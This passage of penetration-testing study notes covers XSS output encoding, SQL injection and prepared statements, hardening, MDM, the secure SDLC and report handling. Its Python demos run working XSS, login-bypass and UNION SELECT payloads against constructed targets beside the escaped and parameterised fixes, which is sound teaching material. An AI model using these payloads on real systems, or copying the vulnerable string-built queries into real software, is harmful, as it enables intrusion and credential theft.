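Output encoding as an added example for these notes (standard-library Python, not any of the sanitizer libraries listed above): the XSS payload from earlier rendered once with raw string interpolation and once through `html.escape`, which is the standard-library equivalent of PHP's htmlspecialchars(), plus the attribute context where forgetting `quote=True` lets a `"` close the attribute. The page templates are constructed.

```python
"""Output encoding for the XSS payload from the notes: the same comment
rendered with raw string interpolation and with context-aware escaping.
Added example for these notes; html.escape is the standard-library
equivalent of PHP's htmlspecialchars(), and the page templates are constructed."""
import html

# The payload from the XSS notes; in a stored XSS it would come back out of the database
PAYLOAD = "<script>alert('This site is vulnerable to XSS!');</script>"


def render_unsafe(comment):
    """Raw interpolation into element content: the browser parses the comment as HTML."""
    return '<p class="comment">%s</p>' % comment


def render_escaped(comment):
    """Element-content context: <, >, & and quotes become entities, so the browser shows them as text."""
    return '<p class="comment">%s</p>' % html.escape(comment, quote=True)


def render_attribute(value):
    """Attribute context: quote=True is essential, otherwise a stray " closes the attribute
    and the rest of the input becomes new attributes such as onfocus=..."""
    return '<input type="text" name="q" value="%s">' % html.escape(value, quote=True)


def has_live_script(doc):
    """Crude marker used only to make the difference visible: does a real <script> tag survive?"""
    return "<script" in doc


if __name__ == "__main__":
    print(render_unsafe(PAYLOAD))
    print(render_escaped(PAYLOAD))
    print(render_attribute('" autofocus onfocus="alert(1)'))
```

Escaping is per output context: what is safe inside an element is not automatically safe inside an attribute, a `<script>` block or a URL, which is why the sanitizer libraries above exist for the cases where you genuinely need to allow some HTML through.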

Parameterisation of Queries (Prepared Statements)

  • More effective at preventing SQLi than escaping input
    • The query template is compiled first and the parameters are sent separately as values, so they can never change the structure of the query
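One block as an added example for these notes (not any framework's code) that serves both the Injection Attacks notes and this parameterisation section: the `' OR 1=1--` authentication bypass and a two-column UNION SELECT against string-built SQL, next to the same two queries written with placeholders. It runs against an in-memory SQLite database with constructed rows; passwords are stored in clear text here only so the UNION result is readable, a real application stores salted hashes.

```python
"""The authentication bypass from the Injection Attacks notes (' OR 1=1--), a
UNION SELECT extraction, and the parameterised version of the same queries.
Added example for these notes; runs against an in-memory SQLite database with
constructed rows. Passwords are stored in clear text here only so the UNION
result is readable; a real application stores salted hashes."""
import sqlite3


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("CREATE TABLE products (name TEXT, price TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("admin", "S3cret!"), ("alice", "wonderland")])
    con.executemany("INSERT INTO products VALUES (?, ?)",
                    [("keyboard", "25.00"), ("monitor", "180.00")])
    return con


def login_vulnerable(con, username, password):
    """String-built SQL: the user's input becomes part of the statement grammar."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = con.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterised(con, username, password):
    """Placeholders: values travel separately from the template and can never change it."""
    row = con.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                      (username, password)).fetchone()
    return row[0] if row else None


def search_vulnerable(con, term):
    """Two-column result set, so a two-column UNION SELECT lines up with it."""
    sql = "SELECT name, price FROM products WHERE name LIKE '%%%s%%'" % term
    return con.execute(sql).fetchall()


def search_parameterised(con, term):
    """The wildcard is part of the bound value, not of the SQL text."""
    return con.execute("SELECT name, price FROM products WHERE name LIKE ?",
                       ("%" + term + "%",)).fetchall()


if __name__ == "__main__":
    con = make_db()
    print(login_vulnerable(con, "' OR 1=1--", "anything"))       # admin: bypassed
    print(login_parameterised(con, "' OR 1=1--", "anything"))    # None
    print(search_vulnerable(con, "x%' UNION SELECT username, password FROM users--"))
```

The `--` at the end of each payload comments out the rest of the original statement, which is why the password clause never gets evaluated; with placeholders the same string is just a very odd username that matches nothing.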

Hardware and Software Hardening


  • Environment
  • Hardware
  • Software

Look at industry standards such as:

  • CIS Controls
  • ISO
  • NIST
  • SANS

Hardening Measures

  • Check with the vendor
  • Look at EAL/Common Criteria (Real world)
  • Ensure firmware and software are updated with updates from the vendor
  • Physical and/or network segmentation

Mobile Device Management (MDM)

  • Centralised Device and App Management
  • Similar systems (MAM)
  • Centrally deploy policies

MDM Features

  • PUSH OS, apps and firmware updates
  • Enrol and authenticate devices
  • Enforce Policies
  • Locate Devices
  • Deploy based on user profiles
  • Remote Wipe/Remote Lock
  • Send out PUSH notification
  • Remote Access
  • Deploy Containers
  • Encryption Control

Secure Software Development

  • Should follow a secure SDLC (Software Development Lifecycle) which incorporates security throughout the entire lifecycle

Security activities in the lifecycle

  • Penetration Testing
  • Static Code Analysis
  • Fuzzing
  • Dynamic Code Analysis
  • Vulnerability Management
  • Dependency Management

The SDLC should be:

  • Clear and simple
  • Useful and informative
  • Easy to incorporate
  • Extensible
  • Have as few dependencies as possible
  • Be concise
  • Use well-known and established techniques
  • Integrate with testing processes and harnesses
  • Align with business and design requirements

Post-Report Delivery Actions

  • Data Normalization
    • Format
    • Structure
    • Language
    • Metrics and Measures
    • Risk Ratings
      • Impact x Likelihood
  • Report Structure
    • Exec Summary
    • Version Control
    • Document Distribution
    • Method
    • Findings
    • Conclusion
      • Successes
      • Failures
      • Goal Assessment
    • Supporting Evidence
  • Risk Appetite
    • How hungry is the customer for accepting risk/residual risk?
      • Compare the risk of the findings against the customer's risk appetite/tolerance levels
    • How much loss can be accepted?
    • What are acceptable levels of availability/loss of availability?
  • Report Storage
    • Encrypt at Rest
    • Encrypt in Transit
    • Access Control for authorised personnel only
    • Store for a specific limited amount of time
  • Report Handling
    • Destruction
  • Report Disposition
    • Formal process of transferring the report to the customer and they then become responsible for it
    • Sign off by the authorised recipient
  • Post Engagement Clean up Tasks
    • Removal of Access/Credentials
    • Removal of Tools
  • Acceptance
  • Attestation of Findings
  • Lessons Learned
  • Follow Up Actions

Useful Exam Theory Links

Microsoft Threat Modelling

Step 1. Identify Assets
Step 2. Create an Architecture Overview
Step 3. Decompose the Application
Step 4. Identify the Threats
Step 5. Document the Threats
Step 6. Rate the Threats

IEEE 802.11 Wireless Standard

Random Stuff

C2 Frameworks

  • Covenant
  • C2
  • Cobalt Strike (Commercial)
  • Metasploit Pro
  • Core Impact
  • SharpC2

DNS Tunnelling

External Resources

The Cyber Mentor Courses on Udemy


Proctored Online Exam Details

Online Practise Questions – Free

Ordering Exam Vouchers

Vouchers Resellers

Windows Vulnerabilities


Resources & Useful Links

UAC Bypasses
